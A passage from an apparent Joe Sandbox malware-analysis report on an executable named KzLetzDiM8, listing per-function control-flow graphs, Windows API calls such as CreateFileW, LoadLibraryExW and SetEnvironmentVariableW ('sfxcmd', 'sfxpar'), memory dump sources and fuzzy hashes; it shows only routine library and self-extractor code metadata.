                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-$c*
                                                            • API String ID: 3664257935-4049937915
                                                            • Opcode ID: 2ae113449d1440c2f35f313d0ef01b7d7b260774a7844e37068e86ebf3857f01
                                                            • Instruction ID: e774ad625e5cdab0132a35c35191254ff0b6d7b3f07d124c763cc14dd01ce8b8
                                                            • Opcode Fuzzy Hash: 2ae113449d1440c2f35f313d0ef01b7d7b260774a7844e37068e86ebf3857f01
                                                            • Instruction Fuzzy Hash: BA11E731A65322ABCB32CF689C4979D77A89F11778F150151E815EB1D1D770EF1086D0
                                                            Function 0020A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 928 20a95b-20a974 929 20a976-20a986 call 20ef4c 928->929 930 20a98a-20a98f 928->930 929->930 937 20a988 929->937 932 20a991-20a999 930->932 933 20a99c-20a9c0 MultiByteToWideChar 930->933 932->933 935 20ab53-20ab66 call 1ffbbc 933->935 936 20a9c6-20a9d2 933->936 938 20a9d4-20a9e5 936->938 939 20aa26 936->939 937->930 942 20aa04-20aa15 call 208e06 938->942 943 20a9e7-20a9f6 call 212010 938->943 941 20aa28-20aa2a 939->941 945 20aa30-20aa43 MultiByteToWideChar 941->945 946 20ab48 941->946 942->946 953 20aa1b 942->953 943->946 956 20a9fc-20aa02 943->956 945->946 949 20aa49-20aa5b call 20af6c 945->949 950 20ab4a-20ab51 call 20abc3 946->950 958 20aa60-20aa64 949->958 950->935 957 20aa21-20aa24 953->957 956->957 957->941 958->946 960 20aa6a-20aa71 958->960 961 20aa73-20aa78 960->961 962 20aaab-20aab7 960->962 961->950 965 20aa7e-20aa80 961->965 963 20ab03 962->963 964 20aab9-20aaca 962->964 968 20ab05-20ab07 963->968 966 20aae5-20aaf6 call 208e06 964->966 967 20aacc-20aadb call 212010 964->967 965->946 969 20aa86-20aaa0 call 20af6c 965->969 972 20ab41-20ab47 call 20abc3 966->972 982 20aaf8 966->982 967->972 980 20aadd-20aae3 967->980 968->972 973 20ab09-20ab22 call 20af6c 968->973 969->950 984 20aaa6 969->984 972->946 973->972 986 20ab24-20ab2b 973->986 985 20aafe-20ab01 980->985 982->985 984->946 985->968 987 20ab67-20ab6d 986->987 988 20ab2d-20ab2e 986->988 989 20ab2f-20ab3f WideCharToMultiByte 987->989 988->989 989->972 990 20ab6f-20ab76 call 20abc3 989->990 990->950
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002057FB,002057FB,?,?,?,0020ABAC,00000001,00000001,2DE85006), ref: 0020A9B5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0020ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0020AA3B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0020AB35
                                                            • __freea.LIBCMT ref: 0020AB42
                                                              • Part of subcall function 00208E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00204286,?,0000015D,?,?,?,?,00205762,000000FF,00000000,?,?), ref: 00208E38
                                                            • __freea.LIBCMT ref: 0020AB4B
                                                            • __freea.LIBCMT ref: 0020AB70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: 2fce1efb294112aee47056721821b27dc91117356dfb130f1293614c5265f559
                                                            • Instruction ID: ba294c1a113e9be18f205843cd81ac61d51daad1f58b248f6cff09ea3e4c64ad
                                                            • Opcode Fuzzy Hash: 2fce1efb294112aee47056721821b27dc91117356dfb130f1293614c5265f559
                                                            • Instruction Fuzzy Hash: 6E510472620317AFDB258F64CC41EBBB7AAEB64754F954628FC04D61C2DB34DCA0CA91
                                                            Function 0020AD34 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 993 20ad34-20ad48 994 20ad55-20ad70 LoadLibraryExW 993->994 995 20ad4a-20ad53 993->995 997 20ad72-20ad7b GetLastError 994->997 998 20ad99-20ad9f 994->998 996 20adac-20adae 995->996 1001 20ad8a 997->1001 1002 20ad7d-20ad88 LoadLibraryExW 997->1002 999 20ada1-20ada2 FreeLibrary 998->999 1000 20ada8 998->1000 999->1000 1003 20adaa-20adab 1000->1003 1004 20ad8c-20ad8e 1001->1004 1002->1004 1003->996 1004->998 1005 20ad90-20ad97 1004->1005 1005->1003
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,@ ,00000000,00000000,?,0020ACDB,@ ,00000000,00000000,00000000,?,0020AED8,00000006,FlsSetValue), ref: 0020AD66
                                                            • GetLastError.KERNEL32(?,0020ACDB,@ ,00000000,00000000,00000000,?,0020AED8,00000006,FlsSetValue,00217970,FlsSetValue,00000000,00000364,?,002098B7), ref: 0020AD72
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0020ACDB,@ ,00000000,00000000,00000000,?,0020AED8,00000006,FlsSetValue,00217970,FlsSetValue,00000000), ref: 0020AD80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID: @
                                                            • API String ID: 3177248105-791083857
                                                            • Opcode ID: 8b628dabb21f61f5acab85cdb004a23c110398e40cd2b88f6ea21cd11cb1b7a6
                                                            • Instruction ID: e3d8cb6b987c405908bb1e098c98ad05921b183d146fa3de3944f0576ed44b64
                                                            • Opcode Fuzzy Hash: 8b628dabb21f61f5acab85cdb004a23c110398e40cd2b88f6ea21cd11cb1b7a6
                                                            • Instruction Fuzzy Hash: 8901F736631323ABC7218F68AC48A977BA8EF65BA27514624FD06D35D1DB30DC11C6E1
                                                            Function 001FAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 001F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001F0836
                                                              • Part of subcall function 001F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001EF2D8,Crypt32.dll,00000000,001EF35C,?,?,001EF33E,?,?,?), ref: 001F0858
                                                            • OleInitialize.OLE32(00000000), ref: 001FAC2F
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001FAC66
                                                            • SHGetMalloc.SHELL32(00228438), ref: 001FAC70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll$3Ro
                                                            • API String ID: 3498096277-3613677438
                                                            • Opcode ID: 4d49d266858f1d79b3f062c9c476fad913a1b276a56eaed112f3687e35b5361f
                                                            • Instruction ID: 8984374d04f639fe471f3cb70ff878d4c278206dca1cd4449fad245a47ed9ee7
                                                            • Opcode Fuzzy Hash: 4d49d266858f1d79b3f062c9c476fad913a1b276a56eaed112f3687e35b5361f
                                                            • Instruction Fuzzy Hash: D7F044B5D00209ABCB10AFA9E8499EFFBFCEF95700F10411AA805A2241CBB456068BA1
                                                            Function 001E98E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1010 1e98e0-1e9901 call 1fec50 1013 1e990c 1010->1013 1014 1e9903-1e9906 1010->1014 1016 1e990e-1e991f 1013->1016 1014->1013 1015 1e9908-1e990a 1014->1015 1015->1016 1017 1e9927-1e9931 1016->1017 1018 1e9921 1016->1018 1019 1e9936-1e9943 call 1e6edb 1017->1019 1020 1e9933 1017->1020 1018->1017 1023 1e994b-1e996a CreateFileW 1019->1023 1024 1e9945 1019->1024 1020->1019 1025 1e996c-1e998e GetLastError call 1ebb03 1023->1025 1026 1e99bb-1e99bf 1023->1026 1024->1023 1030 1e99c8-1e99cd 1025->1030 1035 1e9990-1e99b3 CreateFileW GetLastError 1025->1035 1028 1e99c3-1e99c6 1026->1028 1028->1030 1031 1e99d9-1e99de 1028->1031 1030->1031 1032 1e99cf 1030->1032 1033 1e99ff-1e9a10 1031->1033 1034 1e99e0-1e99e3 1031->1034 1032->1031 1037 1e9a2e-1e9a39 1033->1037 1038 1e9a12-1e9a2a call 1f0602 1033->1038 1034->1033 1036 1e99e5-1e99f9 SetFileTime 1034->1036 1035->1028 1039 1e99b5-1e99b9 1035->1039 1036->1033 1038->1037 1039->1028
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,001E7760,?,00000005,?,00000011), ref: 001E995F
                                                            • GetLastError.KERNEL32(?,?,001E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001E996C
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,001E7760,?,00000005,?), ref: 001E99A2
                                                            • GetLastError.KERNEL32(?,?,001E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001E99AA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001E99F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0
                                                            • Opcode ID: 766ac1eb4c18ba1c64f45afef57d9e9153d81ac12771541acb5a6df1f0c68905
                                                            • Instruction ID: 0fc5f6b0fe28cec4444fa592b317c8500a5b3df995bf93af66375aac6ac45c24
                                                            • Opcode Fuzzy Hash: 766ac1eb4c18ba1c64f45afef57d9e9153d81ac12771541acb5a6df1f0c68905
                                                            • Instruction Fuzzy Hash: 6B312430544B856FE730DF25CC4ABEEBBD4BB54324F100B19F9A1961D2D7B4A984CB91
                                                            Function 001FB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1069 1fb568-1fb581 PeekMessageW 1070 1fb5bc-1fb5be 1069->1070 1071 1fb583-1fb597 GetMessageW 1069->1071 1072 1fb599-1fb5a6 IsDialogMessageW 1071->1072 1073 1fb5a8-1fb5b6 TranslateMessage DispatchMessageW 1071->1073 1072->1070 1072->1073 1073->1070
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001FB579
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FB58A
                                                            • IsDialogMessageW.USER32(00010412,?), ref: 001FB59E
                                                            • TranslateMessage.USER32(?), ref: 001FB5AC
                                                            • DispatchMessageW.USER32(?), ref: 001FB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0
                                                            • Opcode ID: ff7e0599f8adaaec8338789611bcd939583cdabf43a14de80c3234264cfa5eff
                                                            • Instruction ID: 7c36ff66666821851a2f729b08988f92ad3f290c68fbba41364ae1af37b76971
                                                            • Opcode Fuzzy Hash: ff7e0599f8adaaec8338789611bcd939583cdabf43a14de80c3234264cfa5eff
                                                            • Instruction Fuzzy Hash: D2F0D075A0121ABB8B20EBE5EC4CDEB7FBCEE067917004515F509D2010EB38D605CBB0
                                                            Function 001FABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1074 1fabab-1fabca GetClassNameW 1075 1fabcc-1fabe1 call 1f1fbb 1074->1075 1076 1fabf2-1fabf4 1074->1076 1081 1fabe3-1fabef FindWindowExW 1075->1081 1082 1fabf1 1075->1082 1078 1fabff-1fac01 1076->1078 1079 1fabf6-1fabf9 SHAutoComplete 1076->1079 1079->1078 1081->1082 1082->1076
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 001FABC2
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 001FABF9
                                                              • Part of subcall function 001F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001EC116,00000000,.exe,?,?,00000800,?,?,?,001F8E3C), ref: 001F1FD1
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 001FABE9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: EDIT
                                                            • API String ID: 4243998846-3080729518
                                                            • Opcode ID: 49e3912482708dd3635d4e941a6f3c4d3dfa8d1c3ea9874fb150d684f3b9f2c5
                                                            • Instruction ID: 324bd3598c8080260042fede6f59c5cfa04d43208546e0c55d4e5e634604e75b
                                                            • Opcode Fuzzy Hash: 49e3912482708dd3635d4e941a6f3c4d3dfa8d1c3ea9874fb150d684f3b9f2c5
                                                            • Instruction Fuzzy Hash: F2F0827660022D76DB309664AC0AFEB76AC9F46B41F884111BA09A21C0D765DE46C5B6
                                                            Function 001FDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1083 1fdbde-1fdc09 call 1fec50 SetEnvironmentVariableW call 1f0371 1087 1fdc0e-1fdc12 1083->1087 1088 1fdc36-1fdc38 1087->1088 1089 1fdc14-1fdc18 1087->1089 1090 1fdc21-1fdc28 call 1f048d 1089->1090 1093 1fdc1a-1fdc20 1090->1093 1094 1fdc2a-1fdc30 SetEnvironmentVariableW 1090->1094 1093->1090 1094->1088
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 001FDBF4
                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001FDC30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439
                                                            • Opcode ID: b429d3accdc954ab0f992bf1ea0573d1cc086eefbd2c4896f1ea358ca8475045
                                                            • Instruction ID: 5e4016e38c58a84b1d818642cb6bbb7c16346e82ce0660595d97a2ed64267b19
                                                            • Opcode Fuzzy Hash: b429d3accdc954ab0f992bf1ea0573d1cc086eefbd2c4896f1ea358ca8475045
                                                            • Instruction Fuzzy Hash: 33F0ECB241423CBBDB215F94AC0ABFA3799AF25B81B040455BF8996051DBF08980D6F0
                                                            Function 001E9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 001E9795
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 001E97AD
                                                            • GetLastError.KERNEL32 ref: 001E97DF
                                                            • GetLastError.KERNEL32 ref: 001E97FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: 0287b8e6f1366a14af1b5b7f17fa0b8c369e95394ec1449826c8e6586633a51c
                                                            • Instruction ID: f1f30a7fbe8d8654a8d07c57f42de7b981342c12d0b236d0a77d747c913d9cb3
                                                            • Opcode Fuzzy Hash: 0287b8e6f1366a14af1b5b7f17fa0b8c369e95394ec1449826c8e6586633a51c
                                                            • Instruction Fuzzy Hash: C811A531910A48EBDF209F67D804AAD37E9FB56370F108529F416C51A0D774DE48DF61
                                                            Function 0020BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 002097E5: GetLastError.KERNEL32(?,00221098,00204674,00221098,?,?,002040EF,?,?,00221098), ref: 002097E9
                                                              • Part of subcall function 002097E5: _free.LIBCMT ref: 0020981C
                                                              • Part of subcall function 002097E5: SetLastError.KERNEL32(00000000,?,00221098), ref: 0020985D
                                                              • Part of subcall function 002097E5: _abort.LIBCMT ref: 00209863
                                                              • Part of subcall function 0020BB4E: _abort.LIBCMT ref: 0020BB80
                                                              • Part of subcall function 0020BB4E: _free.LIBCMT ref: 0020BBB4
                                                              • Part of subcall function 0020B7BB: GetOEMCP.KERNEL32(00000000,?,?,0020BA44,?), ref: 0020B7E6
                                                            • _free.LIBCMT ref: 0020BA9F
                                                            • _free.LIBCMT ref: 0020BAD5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID: p!
                                                            • API String ID: 2991157371-1659649850
                                                            • Opcode ID: aca3a1855d063805d7488d352447ecbfb48a88571af7acf69ad077d3667bb1bb
                                                            • Instruction ID: 1efb9710960a78a814330f96d37e772e2bdd806cd1c4ce0a9541fa78061821f7
                                                            • Opcode Fuzzy Hash: aca3a1855d063805d7488d352447ecbfb48a88571af7acf69ad077d3667bb1bb
                                                            • Instruction Fuzzy Hash: C231C431A1030AAFDB21DF68D845B99B7F5EF44324F214099E9049B2E3EB325D60CF50
                                                            Function 001F101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 001F1043
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 001F108A
                                                              • Part of subcall function 001E6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E6C54
                                                              • Part of subcall function 001E6DCB: _wcschr.LIBVCRUNTIME ref: 001E6E0A
                                                              • Part of subcall function 001E6DCB: _wcschr.LIBVCRUNTIME ref: 001E6E19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2706921342-3849766595
                                                            • Opcode ID: 1ff6431ed40a8171cd091d9fc3b8d2529f9ace602ca1a3cd0374b32f1420f1c0
                                                            • Instruction ID: f6d1e8b3840fac8a8acd47c04301a34d60149a2d937ffe478535b828c3cbc3e8
                                                            • Opcode Fuzzy Hash: 1ff6431ed40a8171cd091d9fc3b8d2529f9ace602ca1a3cd0374b32f1420f1c0
                                                            • Instruction Fuzzy Hash: 4101DBB534434DBBD3345E64BC55FBA7399EB70751F20002DFA8752284CFA1A9954624
                                                            Function 001E9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,001ED343,00000001,?,?,?,00000000,001F551D,?,?,?), ref: 001E9F9E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,001F551D,?,?,?,?,?,001F4FC7,?), ref: 001E9FE5
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,001ED343,00000001,?,?), ref: 001EA011
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$Handle
